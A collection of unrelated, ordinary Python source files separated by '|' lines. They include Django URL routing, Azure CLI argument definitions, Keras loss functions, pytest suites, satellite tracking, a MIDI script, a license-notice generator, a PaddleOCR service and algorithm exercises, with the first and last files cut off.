return vv
def find_prime_factor(hm):
for x in range(1, 1000):
c = try_factorization_mod_one((hm)**x)
if c[0] != 1:
if hm % c[0] == 0 :
print(x,c[0])
break
def build_composite_number(hm):
si = hm[-1]
for x in range(len(hm)-2, -1, -1):
si = si * hm[x] + hm[x]
return si
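# Round-trip sanity check (mirrors the In [154]/In [155] example above):
# build_composite_number(try_factorization_mod(1009732533765211)) == 1009732533765211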
|
########################################
# INSTRUCTIONS
# Replace the xxxx with the name of your sql server and the name of the Database
# If your SQLITE dummy db is in another directory from the script, you can update that as well.
#
# NOTE: retain the quotation marks around the server and db name.
# NOTE: DO NOT alter the variable names, ie the text 'MSSQL_server_name' and
# 'datamart_name'. If you change them the program will not run.
#
# Example of what it should look like:
# MSSQL_server_name = 'my-server'
# datamart_name = 'my-datamart'
#################################################
# replace the content between the '' ONLY
MSSQL_server_name = 'xxxx'
datamart_name = 'xxxx'
# only change this if your dummy database is in another directory
sqlite_location = 'member_net\\demo_data.db'
|
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import views as base_auth_views
from django.conf import settings
from django.conf.urls.static import static
from django.urls import reverse_lazy
from django.views.generic import RedirectView
urlpatterns = [
# Admin redirections/views
url(r'^admin/login/$', RedirectView.as_view(url=reverse_lazy(settings.LOGIN_URL),
query_string=True)),
url(r'^staff/login/$', RedirectView.as_view(url=reverse_lazy(settings.LOGIN_URL),
query_string=True)),
url(r'^admin/$', RedirectView.as_view(url=reverse_lazy('admin:app_list',
args=('huntserver',)))),
url(r'^staff/$', RedirectView.as_view(url=reverse_lazy('admin:app_list',
args=('huntserver',)))),
url(r'^staff/', admin.site.urls),
url(r'^admin/', admin.site.urls),
# All of the huntserver URLs
url(r'^', include('huntserver.urls', namespace="huntserver")),
# User auth/password reset
url(r'^accounts/logout/$', base_auth_views.LogoutView.as_view(),
name='logout', kwargs={'next_page': '/'}),
url(r'^accounts/login/$', base_auth_views.LoginView.as_view()),
url(r'^password_reset/$', base_auth_views.PasswordResetView.as_view(), name='password_reset'),
url(r'^password_reset/done/$', base_auth_views.PasswordResetDoneView.as_view(),
name='password_reset_done'),
url(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
base_auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
url(r'^reset/done/$', base_auth_views.PasswordResetCompleteView.as_view(),
name='password_reset_complete'),
]
# Use silk if enabled
if 'silk' in settings.INSTALLED_APPS:
urlpatterns.append(url(r'^silk/', include('silk.urls', namespace='silk')))
# Hack for using development server
if settings.DEBUG:
import debug_toolbar
urlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns.append(url(r'^__debug__/', include(debug_toolbar.urls)))
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
from azext_automation.action import (
AddPropertiesParameters
)
from azext_automation.vendored_sdks.automation.models import SkuNameEnum, RunbookTypeEnum
def load_arguments(self, _):
with self.argument_context('automation account list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('automation account show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'], type=str,
help='The name of the automation account.', id_part='name')
with self.argument_context('automation account delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'], type=str,
help='The name of the automation account.', id_part='name')
with self.argument_context('automation account create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'],
help='The name of the automation account.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('sku', help='Account SKU.', arg_type=get_enum_type(SkuNameEnum))
with self.argument_context('automation account update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', options_list=['--name', '-n', '--automation-account-name'],
help='The name of the automation account.', id_part='name')
c.argument('tags', tags_type)
c.argument('sku', help='Account SKU.', arg_type=get_enum_type(SkuNameEnum))
with self.argument_context('automation runbook create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('tags', tags_type)
c.argument('runbook_type', options_list=['--type'], help='Type of the runbook.',
arg_type=get_enum_type(RunbookTypeEnum))
c.argument('description', type=str, help='Description of the runbook.')
c.argument('log_verbose', arg_type=get_three_state_flag(), help='Verbose log option of the runbook.')
c.argument('log_progress', arg_type=get_three_state_flag(), help='Progress log option of the runbook.')
c.argument('log_activity_trace', type=int, help='Activity level tracing options of the runbook.')
with self.argument_context('automation runbook update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.',
id_part='child_name_1')
c.argument('tags', tags_type)
c.argument('description', type=str, help='Description of the runbook.')
c.argument('log_verbose', arg_type=get_three_state_flag(), help='Verbose log option of the runbook.')
c.argument('log_progress', arg_type=get_three_state_flag(), help='Progress log option of the runbook.')
c.argument('log_activity_trace', type=int, help='Activity level tracing options of the runbook.')
with self.argument_context('automation runbook replace-content') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], help='The runbook name.',
id_part='child_name_1')
c.argument('content', help='The runbook content.')
with self.argument_context('automation runbook revert-to-published') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], help='The runbook name.',
id_part='child_name_1')
with self.argument_context('automation runbook start') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('name', options_list=['--name', '-n', '--runbook-name'], type=str, help='The runbook name.',
id_part='child_name_1')
c.argument('properties_parameters', options_list=['--parameters'], action=AddPropertiesParameters, nargs='*',
help='Parameters of the job. Expect value: KEY1=VALUE1 KEY2=VALUE2 ...')
c.argument('run_on', type=str, help='RunOn which specifies the group name where the job is to be executed.')
with self.argument_context('automation job list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.')
with self.argument_context('automation job show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
# with self.argument_context('automation job get-output') as c:
# c.argument('resource_group_name', resource_group_name_type)
# c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
# c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
# id_part='child_name_1')
with self.argument_context('automation job resume') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
with self.argument_context('automation job stop') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
with self.argument_context('automation job suspend') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('automation_account_name', type=str, help='The name of the automation account.', id_part='name')
c.argument('job_name', options_list=['--name', '-n', '--job-name'], type=str, help='The job name.',
id_part='child_name_1')
|
import numpy as np
import tensorflow as tf
from tensorflow.keras import backend as K
def l1_error(y_true, y_pred):
"""Calculate the L1 loss used in all loss calculations"""
if K.ndim(y_true) == 4:
return K.mean(K.abs(y_pred - y_true), axis=[1,2,3])
elif K.ndim(y_true) == 3:
return K.mean(K.abs(y_pred - y_true), axis=[1,2])
else:
        raise NotImplementedError("l1_error expects 3D or 4D tensors; 1D inputs should not occur for this network")
def gram_matrix(x, norm_by_channels=False):
"""Calculate gram matrix used in style loss"""
# Assertions on input
assert K.ndim(x) == 4, 'Input tensor should be a 4d (B, H, W, C) tensor'
assert K.image_data_format() == 'channels_last', "Please use channels-last format"
# Permute channels and get resulting shape
x = K.permute_dimensions(x, (0, 3, 1, 2))
shape = K.shape(x)
B, C, H, W = shape[0], shape[1], shape[2], shape[3]
# Reshape x and do batch dot product
features = K.reshape(x, K.stack([B, C, H*W]))
gram = K.batch_dot(features, features, axes=2)
# Normalize with channels, height and width
gram = gram / K.cast(C * H * W, x.dtype)
return gram
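# Note (added): with the feature map flattened to F of shape (C, H*W) per sample, the value
# returned above is G = F @ F.T / (C * H * W), i.e. channel-to-channel correlations
# normalized by the feature map size.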
def total_variation(y_comp):
    """Total variation loss, used for smoothing the hole region, see eq. 6"""
a = l1_error(y_comp[:,1:,:,:], y_comp[:,:-1,:,:])
b = l1_error(y_comp[:,:,1:,:], y_comp[:,:,:-1,:])
return a + b
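# Smoke-test sketch (illustrative, not part of the original module):
# import numpy as np
# tv = total_variation(K.constant(np.random.rand(2, 8, 8, 3)))
# `tv` has shape (2,): one total-variation value per image in the batch.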
|
import numpy
n, m, p = map(int, raw_input().split())
entries_1 = []
entries_2 = []
for i in range(n):
entries_1.append(map(int, raw_input().split()))
matrix_1 = numpy.array(entries_1)
matrix_1 = numpy.reshape(matrix_1, (n,p))
for j in range(m):
entries_2.append(map(int, raw_input().split()))
matrix_2 = numpy.array(entries_2)
matrix_2 = numpy.reshape(matrix_2, (m,p))
print numpy.concatenate((matrix_1,matrix_2), axis = 0)
|
# .................................................................................................................
level_dict["church"] = {
"scheme": "yellow_scheme",
"size": (5,7,5),
"intro": "church",
"help": (
"$scale(1.5)mission:\nactivate the exit!\n\n" + \
"to activate the exit,\nfeed it with electricity:\n\n" + \
"connect the generator\nwith the motor\n\n" + \
"place a wire stone\nnext to the exit",
),
"player": { "position": (1,0,0),
},
"exits": [
{
"name": "exit",
"active": 0,
"position": (0,-1,0),
},
],
"create":
"""
s = world.getSize()
world.addObjectLine ("KikiWireStone()", KikiPos (0, 0, 0), KikiPos (0, s.y-2, 0))
world.addObjectLine ("KikiWireStone()", KikiPos (s.x-1, 0, 0), KikiPos (s.x-1, s.y-2, 0))
world.addObjectLine ("KikiWireStone()", KikiPos (s.x-1, 0, s.z-1), KikiPos (s.x-1, s.y-2, s.z-1))
world.addObjectLine ("KikiWireStone()", KikiPos (0, 0, s.z-1), KikiPos (0, s.y-2, s.z-1))
world.addObjectAtPos (KikiBomb(), KikiPos (s.x/2, s.y-2, s.z/2))
world.addObjectAtPos (KikiGenerator (KikiFace.PY), KikiPos (s.x/2, s.y/2, s.z/2))
world.addObjectAtPos (KikiWireStone(), KikiPos (1, s.y-2, 1))
world.addObjectAtPos (KikiWireStone(), KikiPos (s.x-2, s.y-2, 1))
world.addObjectAtPos (KikiWireStone(), KikiPos (1, s.y-2, s.z-2))
world.addObjectAtPos (KikiWireStone(), KikiPos (s.x-2, s.y-2, s.z-2))
world.addObjectAtPos (KikiWireStone(), KikiPos (s.x/2, s.y-1, s.z/2))
world.addObjectAtPos (KikiMotorGear (KikiFace.PY), KikiPos (s.x/2, 0, 0))
world.addObjectAtPos (KikiMotorCylinder (KikiFace.PY), KikiPos (s.x/2, 1, 0))
""",
}
|
from .check_individuals import check_individuals
from .get_genotypes import get_genotypes
from .check_mendelian_error import check_mendelian_error
from .check_high_quality import check_high_quality
from .check_common_variant import check_common_variant
|
import pytest
import os
import sys
import runAM
import json
# add the project directory to sys.path so that imports work
test_file = os.path.realpath(__file__)
test_dir = os.path.dirname(test_file)
project_dir = os.path.dirname(test_dir)
sys.path.append(project_dir)
def test_000_can_assert_true():
# before any test verify if PyTest is working and can assert True
assert True
def test_010_addServerTicket():
# add server ticket into server_tickets table
inserted_docID_list = list()
# add profile tickets first, as they are recovered to run self.generatePortConfigData()
profileStore = runAM.ProfileTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
profileStore.drop_table('profile_tickets')
ticket_filename = os.path.join(test_dir, "data/profile_tickets/fallback.yml")
ticket_data = runAM.read.yaml_file(ticket_filename)
profileStore.addProfileTicket(ticket_data)
# add server tickets
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
serverStore.drop_table('server_tickets')
ticket_filename_list = ['test_server1.yml', 'test_server2.yml', 'test_server4.yml']
for ticket_filename in ticket_filename_list:
fullpath = os.path.join(test_dir, f"data/server_tickets/{ticket_filename}")
ticket_data = runAM.read.yaml_file(fullpath)
docIDs_just_inserted = serverStore.addServerTicket(ticket_data)
for docID in docIDs_just_inserted:
inserted_docID_list.append(docID)
assert inserted_docID_list == ['1', '2', '3']
def test_015_addServerTicket_failed(capsys):
# confirm that ticket with a duplicate switch_name/switch_port combination can not be added
with pytest.raises(SystemExit) as pytest_wrapped_e:
inserted_docID_list = list()
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
# add server ticket into server_tickets table
ticket_filename_list = ['test_server3.yml']
for ticket_filename in ticket_filename_list:
fullpath = os.path.join(test_dir, f"data/server_tickets/{ticket_filename}")
ticket_data = runAM.read.yaml_file(fullpath)
docIDs_just_inserted = serverStore.addServerTicket(ticket_data)
for docID in docIDs_just_inserted:
inserted_docID_list.append(docID)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 'ERROR: Can not add test_server3. Port Ethernet1/1 on LEAF1B is already in use.'
def test_020_queryServerTicket():
# find a server with specific ID in the server_tickets table
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
server_list = serverStore.queryServerTicket(server_id='test_server1')
assert server_list == [{
"1": {
"server_id": "test_server1",
"notes": [
"add ticket number",
"or any other notes here"
],
"connections": [
{
"switch_name": "LEAF1A",
"switch_port": "Ethernet1/1",
"port_channel": {
"profiles": [
[
"fallback",
"port_channel"
]
],
"mode": "active"
},
"switchport": {
"mode": "trunk",
"vlan": "1, 5-55"
}
},
{
"switch_name": "LEAF1B",
"switch_port": "Ethernet1/1",
"port_channel": {
"profiles": [
[
"fallback",
"port_channel"
]
],
"mode": "active"
},
"switchport": {
"mode": "trunk",
"vlan": "1, 5-55"
}
}
]
}
}]
def test_030_deleteServerTicket():
# delete a server with specific ID in from server_tickets table
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
deleted_docs = serverStore.deleteServerTicket(server_id='test_server1')
assert deleted_docs == ['1']
|
from datetime import timedelta
from typing import Callable, Dict
import pytest
from carica.models import SerializableTimedelta
from random import randint
import random
RANDOM_SEED = 2128348248
random.seed(RANDOM_SEED)
key_tdGetters: Dict[str, Callable[[timedelta], int]] = {
"weeks": lambda td: 0 if td.days < 7 else td.days // 7,
"days": lambda td: td.days - key_tdGetters["weeks"](td) * 7,
"hours": lambda td: 0 if td.seconds < 3600 else td.seconds // 3600,
"minutes": lambda td: 0 if (td.seconds % 3600) < 60 else (td.seconds % 3600) // 60,
"seconds": lambda td: td.seconds - (key_tdGetters["hours"](td) * 3600) - (key_tdGetters["minutes"](td) * 60),
"milliseconds": lambda td: 0 if td.microseconds < 1000 else td.microseconds // 1000,
"microseconds": lambda td: td.microseconds - key_tdGetters["milliseconds"](td) * 1000
}
def distributeSerializedData(data: Dict[str, int]) -> Dict[str, int]:
    """Flatten out all of the values in data, pushing times up into the largest units they fit in.
    This yields a minimal, canonical dict representing the same span of time.
    """
td = timedelta(**data)
return {k: key_tdGetters[k](td) for k in key_tdGetters}
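# Worked example (added for clarity, derived from the key_tdGetters above):
# distributeSerializedData({"seconds": 3700}) pushes the raw value up into the largest units
# that fit, yielding {"hours": 1, "minutes": 1, "seconds": 40} with zeros for the other keys.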
def randomTestData(mini=1, maxi=1000):
weeks = randint(mini, maxi)
days = randint(mini, maxi)
hours = randint(mini, maxi)
minutes = randint(mini, maxi)
seconds = randint(mini, maxi)
milliseconds = randint(mini, maxi)
microseconds = randint(mini, maxi)
td = SerializableTimedelta(
weeks=weeks,
days=days,
hours=hours,
minutes=minutes,
seconds=seconds,
milliseconds=milliseconds,
microseconds=microseconds
)
data = {
"weeks": weeks,
"days": days,
"hours": hours,
"minutes": minutes,
"seconds": seconds,
"milliseconds": milliseconds,
"microseconds": microseconds
}
return td, data
sampleData = [
(
# All fields
SerializableTimedelta(
weeks=1,
days=2,
hours=14,
minutes=1,
seconds=532,
milliseconds=2345,
microseconds=1
),
{
"weeks": 1,
"days": 2,
"hours": 14,
"minutes": 1,
"seconds": 532,
"milliseconds": 2345,
"microseconds": 1
}
),
(
# No fields
SerializableTimedelta(),
{
"weeks": 0,
"days": 0,
"hours": 0,
"minutes": 0,
"seconds": 0,
"milliseconds": 0,
"microseconds": 0
}
),
(
# Minimal fields
SerializableTimedelta(
microseconds=1
),
{
"microseconds": 1
}
)
]
numRandomItems = 10
# Add a load of randomly generated test data
sampleData += [randomTestData() for _ in range(numRandomItems)]
@pytest.mark.parametrize(("testTD", "expectedData"), sampleData)
def test_timedelta_serialize_hasCorrectContents(testTD: SerializableTimedelta, expectedData: Dict[str, int]):
serialized = testTD.serialize()
expectedData = distributeSerializedData(expectedData)
for k in key_tdGetters:
if key_tdGetters[k](testTD) != 0:
assert k in serialized
assert k in expectedData
assert serialized[k] == expectedData[k]
return True
@pytest.mark.parametrize(("testData", "expectedTD"), [(data, td) for td, data in sampleData])
def test_timedelta_deserialize_hasCorrectContents(testData: str, expectedTD: SerializableTimedelta):
deserialized = SerializableTimedelta.deserialize(testData)
assert deserialized == expectedTD
return True
@pytest.mark.parametrize(("testTD", "expectedTD"), [(timedelta(**data), td) for td, data in sampleData])
def test_timedelta_fromTimedelta_hasCorrectContents(testTD: timedelta, expectedTD: SerializableTimedelta):
newTD = SerializableTimedelta.fromTimedelta(testTD)
assert test_timedelta_serialize_hasCorrectContents(newTD, expectedTD.serialize())
return True
|
import sys
import math
import ephem
import serial
import Queue
import Command
import time
choice = []
def readingTLE(file):
TLEfile = open(file,'r')
    # for every TLE in the file
for line in TLEfile:
line1 = line
line2 = TLEfile.next().strip()
line3 = TLEfile.next().strip()
iss = ephem.readtle(line1, line2, line3)
obs = ephem.Observer()
obs.lat = '42.02690'
obs.long = '-93.65278'
for p in range(3):
            try:
                tr, azr, tt, altt, ts, azs = obs.next_pass(iss)
            except ValueError:
                print "Cannot see it"
                sys.exit(1)
times = Command.PassTimes(tr, ts)
commands = Queue.Queue(0)
while tr < ts:
obs.date = tr
iss.compute(obs)
c = Command.Command(math.degrees(iss.az), math.degrees(iss.alt))
commands.put_nowait(c)
#print commands.get_nowait()
tr = ephem.Date(tr + 1.0 * ephem.second)
choices = Command.Choice(commands, times, altt)
choice.append(choices)
obs.date = tr + ephem.minute
#moveRotor()
print "--------------"
def options():
    return choice
def moveRotor():
#controllerSerial = serial.Serial(COM3,9600,serial.EIGHTBITS,serial.PARITY_NONE,serial.STOPBITS_ONE)
c = choice[0]
b = Queue.Queue(0)
b = c.getCommands()
while not b.empty():
#print q.__name__
#controllerSerial.write(a)
print b.get_nowait().__repr__()
time.sleep(1)
readingTLE('weather.txt')
|
#!/usr/bin/env python
"""
Send random notes to the output port.
"""
from __future__ import print_function
import sys
import time
import random
import mido
from mido import Message
if len(sys.argv) > 1:
portname = sys.argv[1]
else:
portname = None # Use default port
# A pentatonic scale
notes = [60, 62, 64, 67, 69, 72]
try:
with mido.open_output(portname, autoreset=True) as port:
print('Using {}'.format(port))
while True:
note = random.choice(notes)
on = Message('note_on', note=note)
print('Sending {}'.format(on))
port.send(on)
time.sleep(0.05)
off = Message('note_off', note=note)
print('Sending {}'.format(off))
port.send(off)
time.sleep(0.1)
except KeyboardInterrupt:
pass
print()
|
import argparse
import numpy as np
import torch
import config
device = torch.device('cuda')
def to_np(x):
return x.data.cpu().numpy()
def to_tensor(x):
return torch.tensor(x).float().to(device)
def load_data(path):
file = np.load('{}/saved_outputs.npz'.format(path))
intermediate_x_train = to_tensor(file['intermediate_train'])
intermediate_x_test = to_tensor(file['intermediate_test'])
y_pred = to_tensor(file['pred_train']).squeeze()
y = to_tensor(file['labels_train']).float()
y_test = to_tensor(file['labels_test']).float()
W = to_tensor(file['weight']).to(device)
return intermediate_x_train, intermediate_x_test, y_pred, y, y_test, W
def calculate_grads(path):
intermediate_x_train, intermediate_x_test, y_pred, y, y_test, W = load_data(path)
intermediate_x_train = intermediate_x_train.squeeze().unsqueeze(1)
intermediate_x_test = intermediate_x_test.squeeze().unsqueeze(1)
# use trained model to calculate influences
Phi = torch.sigmoid(torch.matmul(intermediate_x_train, W.transpose(0, 1)).squeeze())
grad_first = torch.bmm((Phi - y).view(-1, 1, 1), intermediate_x_train)
Phi_test = torch.sigmoid(torch.matmul(intermediate_x_test, W.transpose(0, 1)).squeeze())
jaccobian_test = torch.bmm((Phi_test - y_test).view(-1, 1, 1), intermediate_x_test)
grad_second = torch.bmm(torch.bmm(intermediate_x_train.transpose(1, 2), (Phi * (1 - Phi)).view(-1, 1, 1)),
intermediate_x_train)
hessian_inverse = torch.inverse(torch.mean(grad_second, dim=0))
return grad_first, hessian_inverse, jaccobian_test
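# Note (added): the pieces computed above follow the usual influence-function recipe for a
# logistic output layer: grad_first holds per-example training-loss gradients, grad_second
# averages to the loss Hessian (inverted above), and jaccobian_test holds per-example test
# gradients. calculate_influence_weights below combines them as -(1/n) * H^{-1} * grad_i,
# which, up to scaling and sign conventions, matches the Koh & Liang (2017) formulation.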
def calculate_influence_weights(path):
grads_first, hessian_inverse, jaccobian_test = calculate_grads('{}/model'.format(path))
samples = len(grads_first)
weight_matrix = []
self_influence = []
for i in range(samples):
weight = (-1 / samples) * torch.matmul(hessian_inverse, grads_first[i].transpose(0, 1))
weight_matrix.append(weight)
self_influence.append(-1 * torch.matmul(grads_first[i], weight))
weight_matrix = torch.stack(weight_matrix)
self_influence = torch.stack(self_influence)
np.savez('{}/calculated_weights/influence_weight_matrix'.format(path),
weight_matrix=to_np(weight_matrix), self_influence=to_np(self_influence),
jaccobian_test=to_np(jaccobian_test))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Calculate Influence Function weights')
parser.add_argument('--model', default='RNN', type=str, help='Interested model: CNN, RNN, or Xgboost')
args = parser.parse_args()
calculate_influence_weights(path='{}/models/{}/saved_models/base'.format(config.project_root, args.model))
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
from collections import defaultdict
outfile = None
moduleHeaderLine = "#" * 12
dependencyHeaderLine = "=" * 17
def print_outfile(string):
print(string, file=outfile)
def print_log_to_stderr(string):
print(string, file=sys.stderr)
def print_notice(dependency):
    # a dependency may either supply a single notice for the whole dependency in the 'notice' field,
    # or per-jar notices in the 'notices' field
if 'notice' in dependency:
# single notice for dependency name, list out all 'libraries' if any, then print notice
print_outfile("{} {} {} {}".format(dependencyHeaderLine, dependency['name'], dependency['version'], dependencyHeaderLine))
if 'libraries' in dependency:
for library in dependency['libraries']:
for group_id, artifact_id in library.items():
print_outfile("{}.jar".format(artifact_id))
print_outfile("{}".format(dependencyHeaderLine))
print_outfile("{}\n\n\n\n".format(dependency['notice']))
elif 'notices' in dependency:
# if 'notices' is set instead of 'notice', then it has jar specific notices to print
for notice_entry in dependency['notices']:
for jar, notice in notice_entry.items():
print_outfile("{} {}-{}.jar {}".format(dependencyHeaderLine, jar, dependency['version'], dependencyHeaderLine))
print_outfile("{}\n\n\n\n".format(notice))
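# Illustrative registry entry (hypothetical values, shown only to clarify the 'notice' vs
# 'notices' handling above; the real entries live in the license YAML passed on the CLI):
# name: example-lib
# version: 1.2.3
# module: extensions/example
# libraries:
#   - com.example: example-lib-core
# notice: |
#   Example Lib
#   Copyright 20xx The Example Authors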
def generate_notice(source_notice, dependences_yaml):
print_log_to_stderr("=== Generating the contents of NOTICE.BINARY file ===\n")
# Print Apache license first.
print_outfile(source_notice)
with open(dependences_yaml, encoding='utf-8') as registry_file:
        dependencies = list(yaml.load_all(registry_file, Loader=yaml.FullLoader))
# Group dependencies by module
modules_map = defaultdict(list)
for dependency in dependencies:
if 'notice' in dependency or 'notices' in dependency:
modules_map[dependency['module']].append(dependency)
# print notice(s) of dependencies by module
for module_name, dependencies_of_module in modules_map.items():
print_outfile("{} BINARY/{} {}\n".format(moduleHeaderLine, module_name.upper(), moduleHeaderLine))
for dependency in dependencies_of_module:
print_notice(dependency)
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser(description='generate binary notice file.')
parser.add_argument('notice', metavar='<path to apache notice file>', type=str)
parser.add_argument('license_yaml', metavar='<path to license.yaml>', type=str)
parser.add_argument('out_path', metavar='<path to output file>', type=str)
args = parser.parse_args()
with open(args.notice, encoding="ascii") as apache_notice_file:
source_notice = apache_notice_file.read()
dependencies_yaml = args.license_yaml
with open(args.out_path, "w", encoding="utf-8") as outfile:
generate_notice(source_notice, dependencies_yaml)
except KeyboardInterrupt:
print('Interrupted, closing.')
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle_serving_client import Client
import cv2
import sys
import numpy as np
import os
import time
import re
import base64
from tools.infer.predict_det import TextDetector
from params import read_params
global_args = read_params()
if global_args.use_gpu:
from paddle_serving_server_gpu.web_service import WebService
else:
from paddle_serving_server.web_service import WebService
class TextDetectorHelper(TextDetector):
def __init__(self, args):
super(TextDetectorHelper, self).__init__(args)
if self.det_algorithm == "SAST":
self.fetch = [
"bn_f_border4.output.tmp_2", "bn_f_tco4.output.tmp_2",
"bn_f_tvo4.output.tmp_2", "sigmoid_0.tmp_0"
]
elif self.det_algorithm == "EAST":
self.fetch = ["sigmoid_0.tmp_0", "tmp_2"]
elif self.det_algorithm == "DB":
self.fetch = ["save_infer_model/scale_0.tmp_0"]
def preprocess(self, img):
img = img.copy()
im, ratio_list = self.preprocess_op(img)
if im is None:
return None, 0
return {
"image": im.copy()
}, self.fetch, {
"ratio_list": [ratio_list],
"ori_im": img
}
def postprocess(self, outputs, args):
outs_dict = {}
if self.det_algorithm == "EAST":
outs_dict['f_geo'] = outputs[0]
outs_dict['f_score'] = outputs[1]
elif self.det_algorithm == 'SAST':
outs_dict['f_border'] = outputs[0]
outs_dict['f_score'] = outputs[1]
outs_dict['f_tco'] = outputs[2]
outs_dict['f_tvo'] = outputs[3]
else:
outs_dict['maps'] = outputs[0]
dt_boxes_list = self.postprocess_op(outs_dict, args["ratio_list"])
dt_boxes = dt_boxes_list[0]
if self.det_algorithm == "SAST" and self.det_sast_polygon:
dt_boxes = self.filter_tag_det_res_only_clip(dt_boxes,
args["ori_im"].shape)
else:
dt_boxes = self.filter_tag_det_res(dt_boxes, args["ori_im"].shape)
return dt_boxes
class DetService(WebService):
def init_det(self):
self.text_detector = TextDetectorHelper(global_args)
def preprocess(self, feed=[], fetch=[]):
data = base64.b64decode(feed[0]["image"].encode('utf8'))
        data = np.frombuffer(data, np.uint8)
im = cv2.imdecode(data, cv2.IMREAD_COLOR)
feed, fetch, self.tmp_args = self.text_detector.preprocess(im)
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map=None):
outputs = [fetch_map[x] for x in fetch]
res = self.text_detector.postprocess(outputs, self.tmp_args)
return {"boxes": res.tolist()}
if __name__ == "__main__":
ocr_service = DetService(name="ocr")
ocr_service.load_model_config(global_args.det_model_dir)
ocr_service.init_det()
if global_args.use_gpu:
ocr_service.prepare_server(
workdir="workdir", port=9292, device="gpu", gpuid=0)
else:
ocr_service.prepare_server(workdir="workdir", port=9292, device="cpu")
ocr_service.run_debugger_service()
ocr_service.run_web_service()
|
# python3
import sys
def build_trie(patterns):
tree = dict()
tree[0] = dict()
nodecount = 1
for p in patterns:
p = p + "$"
currentNode = tree[0]
for i in range(len(p)):
currentSymbol = p[i]
if currentSymbol in currentNode:
currentNode = tree[currentNode[currentSymbol]]
else:
currentNode[currentSymbol] = nodecount
tree[nodecount] = dict()
currentNode = tree[nodecount]
nodecount += 1
return tree
def solve (text, n, patterns):
result = []
tree = build_trie(patterns)
for s in range(len(text)):
currentnode = tree[0]
symbol = text[s]
counter = s
        while True:
            if "$" in currentnode:
                result.append(s)
                break
            elif counter < len(text) and symbol in currentnode:
